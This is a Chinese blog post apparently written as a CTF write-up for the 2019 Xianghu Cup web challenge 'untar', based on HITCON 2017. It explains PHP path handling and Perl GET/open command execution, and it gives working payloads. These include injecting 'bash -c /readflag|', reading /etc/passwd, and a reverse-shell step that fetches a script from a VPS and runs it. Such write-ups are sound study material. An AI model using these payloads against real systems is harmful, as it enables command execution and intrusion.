<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="前言有史以来的垃圾比赛，非常垃圾的题目没有自己的见解，有史以来最py的比赛，其实现在的比赛就这样了，但是如果题目的难度大的话，py的人自然就少了。言简意赅，大家懂的。 大家自己体验一波，不过还是把学到的东西总结一下。0x01 untar题目给了源码：1234567891011121314151617sandbox/2aeae26864f775d4cad75f15a6c95d97&amp;lt;?php">
<meta property="og:type" content="article">
<meta property="og:title" content="2019湘湖杯的web题解">
<meta property="og:url" content="http://yoursite.com/2019/11/13/2019湘湖杯的web题解/index.html">
<meta property="og:site_name" content="L&#39;s Blog">
<meta property="og:description" content="前言有史以来的垃圾比赛，非常垃圾的题目没有自己的见解，有史以来最py的比赛，其实现在的比赛就这样了，但是如果题目的难度大的话，py的人自然就少了。言简意赅，大家懂的。 大家自己体验一波，不过还是把学到的东西总结一下。0x01 untar题目给了源码：1234567891011121314151617sandbox/2aeae26864f775d4cad75f15a6c95d97&amp;lt;?php">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_2.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_1.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/redhat_web2_1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/redhat_web2_2.PNG">
<meta property="og:updated_time" content="2019-11-13T05:06:16.637Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019湘湖杯的web题解">
<meta name="twitter:description" content="前言有史以来的垃圾比赛，非常垃圾的题目没有自己的见解，有史以来最py的比赛，其实现在的比赛就这样了，但是如果题目的难度大的话，py的人自然就少了。言简意赅，大家懂的。 大家自己体验一波，不过还是把学到的东西总结一下。0x01 untar题目给了源码：1234567891011121314151617sandbox/2aeae26864f775d4cad75f15a6c95d97&amp;lt;?php">
<meta name="twitter:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_2.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/11/13/2019湘湖杯的web题解/">





  <title>2019湘湖杯的web题解 | L's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">L's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">share with you</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/13/2019湘湖杯的web题解/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ljdd520">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2019湘湖杯的web题解</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-11-13T12:59:03+08:00">
                2019-11-13
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.8k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  13
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>有史以来的垃圾比赛，非常垃圾的题目没有自己的见解，有史以来最py的比赛，其实现在的比赛就这样了，但是如果题目的难度大的话，py的人自然就少了。言简意赅，大家懂的。<br><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_2.jpg" alt><br><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_1.jpg" alt></p>
<h6 id="大家自己体验一波，不过还是把学到的东西总结一下。"><a href="#大家自己体验一波，不过还是把学到的东西总结一下。" class="headerlink" title="大家自己体验一波，不过还是把学到的东西总结一下。"></a>大家自己体验一波，不过还是把学到的东西总结一下。</h6><h5 id="0x01-untar"><a href="#0x01-untar" class="headerlink" title="0x01 untar"></a>0x01 untar</h5><h6 id="题目给了源码："><a href="#题目给了源码：" class="headerlink" title="题目给了源码："></a>题目给了源码：</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">sandbox/<span class="number">2</span>aeae26864f775d4cad75f15a6c95d97</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $sandbox = <span class="string">"sandbox/"</span> . md5($_SERVER[<span class="string">"REMOTE_ADDR"</span>]);</span><br><span class="line">    <span class="keyword">echo</span> $sandbox.<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">    @mkdir($sandbox);</span><br><span class="line">    @chdir($sandbox);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">"url"</span>]) &amp;&amp; !preg_match(<span class="string">'/^(http|https):\/\/.*/'</span>, $_GET[<span class="string">"url"</span>]))</span><br><span class="line">        <span class="keyword">die</span>();</span><br><span class="line">    $url  = str_replace(<span class="string">"|"</span>, <span class="string">""</span>, $_GET[<span class="string">"url"</span>]);</span><br><span class="line">    $data = shell_exec(<span class="string">"GET "</span> . escapeshellarg($url));</span><br><span class="line">    $info = pathinfo($_GET[<span class="string">"filename"</span>]);</span><br><span class="line">    $dir  = str_replace(<span class="string">"."</span>, <span class="string">""</span>, basename($info[<span class="string">"dirname"</span>]));</span><br><span class="line">    @mkdir($dir);</span><br><span class="line">    @chdir($dir);</span><br><span class="line">    @file_put_contents(basename($info[<span class="string">"basename"</span>]), $data);</span><br><span class="line">    shell_exec(<span class="string">"UNTAR "</span>.escapeshellarg(basename($info[<span class="string">"basename"</span>])));</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<h6 id="于是去搜索了一波。"><a href="#于是去搜索了一波。" class="headerlink" title="于是去搜索了一波。"></a>于是去搜索了一波。</h6><h6 id="原题是HITCON-2017，这段代码先通过XFF判断用户的ip，建立沙盒，并且通过GET传入url和filename两个参数，通过filename建立新的目录以及文件名，通过url进行shell-exec的GET命令执行，最终把执行结果放在新生成的目录下的文件名。"><a href="#原题是HITCON-2017，这段代码先通过XFF判断用户的ip，建立沙盒，并且通过GET传入url和filename两个参数，通过filename建立新的目录以及文件名，通过url进行shell-exec的GET命令执行，最终把执行结果放在新生成的目录下的文件名。" class="headerlink" title="原题是HITCON 2017，这段代码先通过XFF判断用户的ip，建立沙盒，并且通过GET传入url和filename两个参数，通过filename建立新的目录以及文件名，通过url进行shell_exec的GET命令执行，最终把执行结果放在新生成的目录下的文件名。"></a>原题是<code>HITCON 2017</code>，这段代码先通过XFF判断用户的ip，建立沙盒，并且通过<code>GET</code>传入<code>url</code>和<code>filename</code>两个参数，通过<code>filename</code>建立新的目录以及文件名，通过url进行<code>shell_exec</code>的<code>GET</code>命令执行，最终把执行结果放在新生成的目录下的文件名。</h6><h6 id="里面有几个关键的函数我们先来了解一下。"><a href="#里面有几个关键的函数我们先来了解一下。" class="headerlink" title="里面有几个关键的函数我们先来了解一下。"></a>里面有几个关键的函数我们先来了解一下。</h6><h6 id="首先来研究一下pathinfo函数以及basename函数的机制。"><a href="#首先来研究一下pathinfo函数以及basename函数的机制。" class="headerlink" title="首先来研究一下pathinfo函数以及basename函数的机制。"></a>首先来研究一下<code>pathinfo</code>函数以及<code>basename</code>函数的机制。</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_3.png" alt></p>
<h6 id="下面是pathinfo的测试代码："><a href="#下面是pathinfo的测试代码：" class="headerlink" title="下面是pathinfo的测试代码："></a>下面是<code>pathinfo</code>的测试代码：</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$path=<span class="string">"/var/www/html/shell.php"</span>;</span><br><span class="line">$info=pathinfo($path);</span><br><span class="line"><span class="keyword">print</span> $info[<span class="string">"dirname"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">print</span> $info[<span class="string">"basename"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">print</span> $info[<span class="string">"extension"</span>];</span><br></pre></td></tr></table></figure>

<h6 id="结果如下："><a href="#结果如下：" class="headerlink" title="结果如下："></a>结果如下：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/var/www/html</span><br><span class="line">shell.php</span><br><span class="line">php</span><br></pre></td></tr></table></figure>

<h6 id="basename-函数返回路径中的文件名部分，如下测试代码："><a href="#basename-函数返回路径中的文件名部分，如下测试代码：" class="headerlink" title="basename()函数返回路径中的文件名部分，如下测试代码："></a><code>basename()</code>函数返回路径中的文件名部分，如下测试代码：</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$path=<span class="string">"/var/www/html/shell.php"</span>;</span><br><span class="line"><span class="keyword">print</span> basename($path);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">print</span> basename($path,<span class="string">".php"</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br></pre></td></tr></table></figure>

<h6 id="运行的结果如下："><a href="#运行的结果如下：" class="headerlink" title="运行的结果如下："></a>运行的结果如下：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shell.php</span><br><span class="line">shell</span><br></pre></td></tr></table></figure>

<h6 id="代码对于要建立的目录都会两边basename，如下代码："><a href="#代码对于要建立的目录都会两边basename，如下代码：" class="headerlink" title="代码对于要建立的目录都会两边basename，如下代码："></a>代码对于要建立的目录都会两边<code>basename</code>，如下代码：</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$data = shell_exec(<span class="string">"GET "</span> . escapeshellarg($_GET[<span class="string">"url"</span>]));</span><br><span class="line">$info = pathinfo($_GET[<span class="string">"filename"</span>]);</span><br><span class="line">$dir  = str_replace(<span class="string">"."</span>, <span class="string">""</span>, basename($info[<span class="string">"dirname"</span>]));</span><br><span class="line"><span class="keyword">echo</span> $dir;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> $info[<span class="string">"dirname"</span>]; <span class="comment">//$c</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> basename($info[<span class="string">'basename'</span>]);</span><br></pre></td></tr></table></figure>

<h6 id="测试的地址参数："><a href="#测试的地址参数：" class="headerlink" title="测试的地址参数："></a>测试的地址参数：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/test/demo2.php?url=/&amp;filename=/var/www/html/shell.php</span><br></pre></td></tr></table></figure>

<h6 id="测试的结果如下："><a href="#测试的结果如下：" class="headerlink" title="测试的结果如下："></a>测试的结果如下：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">html</span><br><span class="line">/var/www/html</span><br><span class="line">shell.php</span><br></pre></td></tr></table></figure>

<h6 id="如果filename为-a或者a这样的形式，basename-info-39-basename-39-肯定为a的，此时的目录为当前目录，再次用basename返回路径中的文件名肯定为空。如果a-xxx-，-c和-dir返回的都是a，解释一下原因：第一次返回的basename为a其实相当于-a，那么第二次再用basename返回的文件名肯定也是a。理解了之后题目就比较好做了。"><a href="#如果filename为-a或者a这样的形式，basename-info-39-basename-39-肯定为a的，此时的目录为当前目录，再次用basename返回路径中的文件名肯定为空。如果a-xxx-，-c和-dir返回的都是a，解释一下原因：第一次返回的basename为a其实相当于-a，那么第二次再用basename返回的文件名肯定也是a。理解了之后题目就比较好做了。" class="headerlink" title="如果filename为/a或者a这样的形式，basename($info[&#39;basename&#39;]);肯定为a的，此时的目录为当前目录，再次用basename返回路径中的文件名肯定为空。如果a/xxx/，$c和$dir返回的都是a，解释一下原因：第一次返回的basename为a其实相当于./a，那么第二次再用basename返回的文件名肯定也是a。理解了之后题目就比较好做了。"></a>如果<code>filename</code>为/a或者a这样的形式，<code>basename($info[&#39;basename&#39;]);</code>肯定为a的，此时的目录为当前目录，再次用<code>basename</code>返回路径中的文件名肯定为空。如果<code>a/xxx/</code>，<code>$c</code>和<code>$dir</code>返回的都是a，解释一下原因：第一次返回的<code>basename</code>为<code>a</code>其实相当于<code>./a</code>，那么第二次再用<code>basename</code>返回的文件名肯定也是<code>a</code>。理解了之后题目就比较好做了。</h6><h6 id="escapeshellarg与escapeshellcmd函数"><a href="#escapeshellarg与escapeshellcmd函数" class="headerlink" title="escapeshellarg与escapeshellcmd函数"></a>escapeshellarg与escapeshellcmd函数</h6><h6 id="escapeshellarg"><a href="#escapeshellarg" class="headerlink" title="escapeshellarg"></a>escapeshellarg</h6><h6 id="1-确保用户只能传递一个参数给命令。"><a href="#1-确保用户只能传递一个参数给命令。" class="headerlink" title="1. 确保用户只能传递一个参数给命令。"></a>1. 确保用户只能传递一个参数给命令。</h6><h6 id="2-用户不能指定更多的参数一个。"><a href="#2-用户不能指定更多的参数一个。" class="headerlink" title="2. 用户不能指定更多的参数一个。"></a>2. 用户不能指定更多的参数一个。</h6><h6 id="3-用户不能执行不同的命令。"><a href="#3-用户不能执行不同的命令。" class="headerlink" title="3. 用户不能执行不同的命令。"></a>3. 用户不能执行不同的命令。</h6><h6 id="就好比是我传入的ls，那么经过函数的操作后就变成了-39-ls-39-。同时会对传入的单引号进行一些安全处理，例如传入l-39-s就会变成-39-l-39-39-39-s-39-。"><a href="#就好比是我传入的ls，那么经过函数的操作后就变成了-39-ls-39-。同时会对传入的单引号进行一些安全处理，例如传入l-39-s就会变成-39-l-39-39-39-s-39-。" class="headerlink" title="就好比是我传入的ls，那么经过函数的操作后就变成了&#39;ls&#39;。同时会对传入的单引号进行一些安全处理，例如传入l&#39;s就会变成&#39;l&#39;\&#39;&#39;s&#39;。"></a>就好比是我传入的<code>ls</code>，那么经过函数的操作后就变成了<code>&#39;ls&#39;</code>。同时会对传入的单引号进行一些安全处理，例如传入<code>l&#39;s</code>就会变成<code>&#39;l&#39;\&#39;&#39;s&#39;</code>。</h6><h6 id="escapeshellcmd"><a href="#escapeshellcmd" class="headerlink" title="escapeshellcmd"></a>escapeshellcmd</h6><h6 id="1-确保用户只执行一个命令"><a href="#1-确保用户只执行一个命令" class="headerlink" title="1.确保用户只执行一个命令"></a>1.确保用户只执行一个命令</h6><h6 id="2-用户可以指定不限数量的参数"><a href="#2-用户可以指定不限数量的参数" class="headerlink" title="2.用户可以指定不限数量的参数"></a>2.用户可以指定不限数量的参数</h6><h6 id="3-用户不能执行不同的命令"><a href="#3-用户不能执行不同的命令" class="headerlink" title="3.用户不能执行不同的命令"></a>3.用户不能执行不同的命令</h6><h6 id="他的作用是将一些危险的符号进行转义，如："><a href="#他的作用是将一些危险的符号进行转义，如：" class="headerlink" title="他的作用是将一些危险的符号进行转义，如："></a>他的作用是将一些危险的符号进行转义，如：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;，|，；，\ `</span><br></pre></td></tr></table></figure>

<h6 id="对于orange师傅的原题是GET命令的漏洞。"><a href="#对于orange师傅的原题是GET命令的漏洞。" class="headerlink" title="对于orange师傅的原题是GET命令的漏洞。"></a>对于orange师傅的原题是<code>GET命令的漏洞</code>。</h6><h6 id="根本的原因在于perl的GET函数的底层是调用open处理的，而在perl-中，open是可以执行系统命令的。"><a href="#根本的原因在于perl的GET函数的底层是调用open处理的，而在perl-中，open是可以执行系统命令的。" class="headerlink" title="根本的原因在于perl的GET函数的底层是调用open处理的，而在perl`中，open是可以执行系统命令的。"></a>根本的原因在于<code>perl</code>的<code>GET</code>函数<code>的底层是调用</code>open<code>处理的，而在</code>perl`中，open是可以执行系统命令的。</h6><h6 id="例如下面的示例代码："><a href="#例如下面的示例代码：" class="headerlink" title="例如下面的示例代码："></a>例如下面的示例代码：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# cat ./demo.pl</span><br><span class="line">open(FD,&quot;|id&quot;);</span><br><span class="line">print &lt;FD&gt;;</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# perl ./demo.pl</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),999(docker)</span><br></pre></td></tr></table></figure>

<h6 id="从这段命令我们可以看出来perl中的open的作用。同时open是支持file协议的。"><a href="#从这段命令我们可以看出来perl中的open的作用。同时open是支持file协议的。" class="headerlink" title="从这段命令我们可以看出来perl中的open的作用。同时open是支持file协议的。"></a>从这段命令我们可以看出来perl中的open的作用。同时open是支持file协议的。</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">The library supports GET and HEAD methods for file requests.  The</span><br><span class="line">&quot;If-Modified-Since&quot; header is supported.  All other headers are</span><br><span class="line">ignored.  The I&lt;host&gt; component of the file URL must be empty or set</span><br><span class="line">to &quot;localhost&quot;.  Any other I&lt;host&gt; value will be treated as an error.</span><br><span class="line">Directories are always converted to an HTML document.  For normal</span><br><span class="line">files, the &quot;Content-Type&quot; and &quot;Content-Encoding&quot; in the response are</span><br><span class="line">guessed based on the file suffix.</span><br><span class="line">Example:</span><br><span class="line">  $req = HTTP::Request-&gt;new(GET =&gt; &apos;file:/etc/passwd&apos;);</span><br></pre></td></tr></table></figure>

<h6 id="尝试一下file协议读取GEt-39-file-etc-passwd-39-或者GET-39-etc-passwd-39-，都可以成功读取文件内容。下面可以执行系统命令。"><a href="#尝试一下file协议读取GEt-39-file-etc-passwd-39-或者GET-39-etc-passwd-39-，都可以成功读取文件内容。下面可以执行系统命令。" class="headerlink" title="尝试一下file协议读取GEt &#39;file:/etc/passwd&#39;或者GET &#39;/etc/passwd&#39;，都可以成功读取文件内容。下面可以执行系统命令。"></a>尝试一下file协议读取<code>GEt &#39;file:/etc/passwd&#39;</code>或者<code>GET &#39;/etc/passwd&#39;</code>，都可以成功读取文件内容。下面可以执行系统命令。</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ls</span><br><span class="line">demo.pl  ls|</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# GET &apos;file:ls|&apos;</span><br></pre></td></tr></table></figure>

<h6 id="通过以上命令成功执行，这里需要注意的是要有存在的文件名才能成功执行命令，所以新建了一个ls-文件。"><a href="#通过以上命令成功执行，这里需要注意的是要有存在的文件名才能成功执行命令，所以新建了一个ls-文件。" class="headerlink" title="通过以上命令成功执行，这里需要注意的是要有存在的文件名才能成功执行命令，所以新建了一个ls|文件。"></a>通过以上命令成功执行，这里需要注意的是要有存在的文件名才能成功执行命令，所以新建了一个<code>ls|</code>文件。</h6><h6 id="orange的原题我们可以建立执行的文件名，再通过file协议去执行就可以了。"><a href="#orange的原题我们可以建立执行的文件名，再通过file协议去执行就可以了。" class="headerlink" title="orange的原题我们可以建立执行的文件名，再通过file协议去执行就可以了。"></a>orange的原题我们可以建立执行的文件名，再通过file协议去执行就可以了。</h6><h6 id="首先先看一下目录。"><a href="#首先先看一下目录。" class="headerlink" title="首先先看一下目录。"></a>首先先看一下目录。</h6><h6 id="通过Payload-url-amp-filename-xxx，访问沙盒里面的xxx文件。"><a href="#通过Payload-url-amp-filename-xxx，访问沙盒里面的xxx文件。" class="headerlink" title="通过Payload url=/&amp;filename=xxx，访问沙盒里面的xxx文件。"></a>通过Payload url=/&amp;filename=xxx，访问沙盒里面的xxx文件。</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/huXiangBei_4.png" alt></p>
<h6 id="发现flag和readflag，flag是空的，readflag是一个二进制文件，需要通过执行readflag来读取flag。"><a href="#发现flag和readflag，flag是空的，readflag是一个二进制文件，需要通过执行readflag来读取flag。" class="headerlink" title="发现flag和readflag，flag是空的，readflag是一个二进制文件，需要通过执行readflag来读取flag。"></a>发现<code>flag</code>和<code>readflag</code>，flag是空的，readflag是一个二进制文件，需要通过执行readflag来读取flag。</h6><h6 id="构造文件名bash-c-readflag，通过如下payload"><a href="#构造文件名bash-c-readflag，通过如下payload" class="headerlink" title="构造文件名bash -c /readflag，通过如下payload"></a>构造文件名<code>bash -c /readflag</code>，通过如下payload</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">url=/etc/passwd&amp;filename=bash -c /readflag|</span><br><span class="line"></span><br><span class="line">url=file:bash -c /readflag|&amp;filename=a</span><br></pre></td></tr></table></figure>

<h6 id="访问沙盒下的a可以得到flag（这里的-etc-passwd的目的只是为了让我的GET命令请求快点"><a href="#访问沙盒下的a可以得到flag（这里的-etc-passwd的目的只是为了让我的GET命令请求快点" class="headerlink" title="访问沙盒下的a可以得到flag（这里的/etc/passwd的目的只是为了让我的GET命令请求快点)"></a>访问沙盒下的a可以得到flag（这里的/etc/passwd的目的只是为了让我的GET命令请求快点)</h6><h6 id="第二种方法可以利用反弹shell"><a href="#第二种方法可以利用反弹shell" class="headerlink" title="第二种方法可以利用反弹shell"></a>第二种方法可以利用反弹shell</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">url=http://your_vps/port&amp;filename=a</span><br><span class="line"></span><br><span class="line">url=/etc/passwd&amp;filename=bash a|</span><br><span class="line"></span><br><span class="line">url=file:bash a|&amp;filename=xxx</span><br></pre></td></tr></table></figure>

<h6 id="同样需要在你的vps上放一下一句话反弹bash。"><a href="#同样需要在你的vps上放一下一句话反弹bash。" class="headerlink" title="同样需要在你的vps上放一下一句话反弹bash。"></a>同样需要在你的vps上放一下一句话反弹bash。</h6><h6 id="但是上面的这题限制了只能是http或者https，并且过滤了-。"><a href="#但是上面的这题限制了只能是http或者https，并且过滤了-。" class="headerlink" title="但是上面的这题限制了只能是http或者https，并且过滤了|。"></a>但是上面的这题限制了只能是<code>http</code>或者<code>https</code>，并且过滤了<code>|</code>。</h6><h6 id="因此上面的方式全部失效了。但是我们注意到了最后一句。"><a href="#因此上面的方式全部失效了。但是我们注意到了最后一句。" class="headerlink" title="因此上面的方式全部失效了。但是我们注意到了最后一句。"></a>因此上面的方式全部失效了。但是我们注意到了最后一句。</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell_exec(&quot;UNTAR &quot;.escapeshellarg(basename($info[&quot;basename&quot;])));</span><br></pre></td></tr></table></figure>

